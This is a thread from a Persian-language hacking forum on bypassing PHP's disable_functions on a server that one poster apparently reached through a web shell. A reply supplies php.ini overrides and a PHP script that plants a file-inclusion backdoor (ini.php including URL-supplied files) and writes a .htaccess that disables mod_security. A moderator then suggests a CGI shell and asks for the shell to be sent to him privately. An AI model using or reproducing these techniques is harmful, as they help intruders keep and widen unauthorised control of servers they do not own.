انجمن تیم امنیتی ایران سایبر

بایپس Disable Functions

شروع موضوع توسط AliTNT ‏8/3/19 در انجمن تحلیل و بررسی آسیب پذیری های سایت و سرورها

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

شرکت امنیتی ایران سایبر - برگزار کننده دوره های آموزشی و مسابقات فتح پرچم (CTF)
  1. AliTNT
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏2/11/18
    ارسال ها:
    10
    تشکر شده:
    32
    جنسیت:
    Name:
    علی
    Main os:
    Windows
    سلام وقت بخیر
    بنده از یه سروری دسترسی دارم اما هرکاری کردم نتونستم disable functions رو none کنم
    با php.ini هم نشد
    اگه میشه راهنمایی کنید ممنون.
    مشخصات سرور:
    [​IMG]
    فانکشن ها:
    [​IMG]
     
  2. rajaz

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏30/8/17
    ارسال ها:
    195
    تشکر شده:
    999
    Name:
    rajaz
    Main os:
    Ubuntu
    راه های زیادی هست اما باید همشونو امتحان کنید ، اتفاقاً چن وقت پیش به یک سرور اینطوری برخوردم اما با php.ini بایپس شد .
    اگر قابلیت آپلود یا ادیت php.ini رو دارید کد زیر رو قرار بدید
    کد:
    safe_mode = OFF
    disable_functions = NONE
    open_basedir = NONe
    
    
    <html>
    <b><center><h2> <font color="#00ff00"> Safe_Mode Off By <font color="#ff0000"> Solt6n</b>

    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <style type="text/css">BODY {
    BACKGROUND-COLOR: #000000
    }
    </html>

    <?php
    $php = fopen("php.ini", "w");
    $entry_line='
    safe_mode = Off
    ';
    fputs($php, $entry_line);
    fclose($php);

    $ini = fopen("ini.php", "w");
    $ini_line='
    <?php
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["ss"]);
    ?>';
    fputs($ini, $ini_line);
    fclose($ini);

    $hta = fopen(".htaccess", "w");
    $hta_line='
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>';
    fputs($hta, $hta_line);
    fclose($hta);
    ?>

    و در اخر این تاپیک هم ببینید
    کد:
    https://iran-cyber.net/forums/threads/bypass-disable-function.2046/
     
    JOK3R، mr.b3n، AliTNT و یک نفر دیگر از این ارسال تشکر کرده اند.
  3. AliTNT
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏2/11/18
    ارسال ها:
    10
    تشکر شده:
    32
    جنسیت:
    Name:
    علی
    Main os:
    Windows
    سلام و درود
    تشکر از راهنمایی شما
    سرور قابلیت اپلود و ادیت php.ini رو داره یعنی میتونم داخل هاست فایل php.ini بسازم و کدهایی که شما دادید رو قرار بدم متاسفانه بایپس نمیشه با انجام این کار هم

    درضمن اسکریپتی هم که قرار دادید جوابگو نبود
    بازم ممنون
     
    mr.b3n از این پست تشکر کرده است.
  4. blackops
    مدیریت ارشد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏15/9/17
    ارسال ها:
    315
    تشکر شده:
    1,972
    Name:
    hesmat
    Main os:
    Windows
    اگه cagefs رو سیستم نصب شده باشه با php.ini طبیعتا بایپس نمیشه..!
    ببینید می تونید cgi-sheller رو سرور ران کنید.
     
    AliTNT، 0x3a، JOK3R و 2 نفر دیگر از این ارسال تشکر کرده اند.
  5. AliTNT
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏2/11/18
    ارسال ها:
    10
    تشکر شده:
    32
    جنسیت:
    Name:
    علی
    Main os:
    Windows
    متاسفانه ارور
    Internal Server Error میده
     
  6. blackops
    مدیریت ارشد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏15/9/17
    ارسال ها:
    315
    تشکر شده:
    1,972
    Name:
    hesmat
    Main os:
    Windows
    اگه مشکلی ندارید برام شل رو پ خ کنید.
     
    AliTNT از این پست تشکر کرده است.
  7. AliTNT
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏2/11/18
    ارسال ها:
    10
    تشکر شده:
    32
    جنسیت:
    Name:
    علی
    Main os:
    Windows
    پیام دادم دوست عزیز
     
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .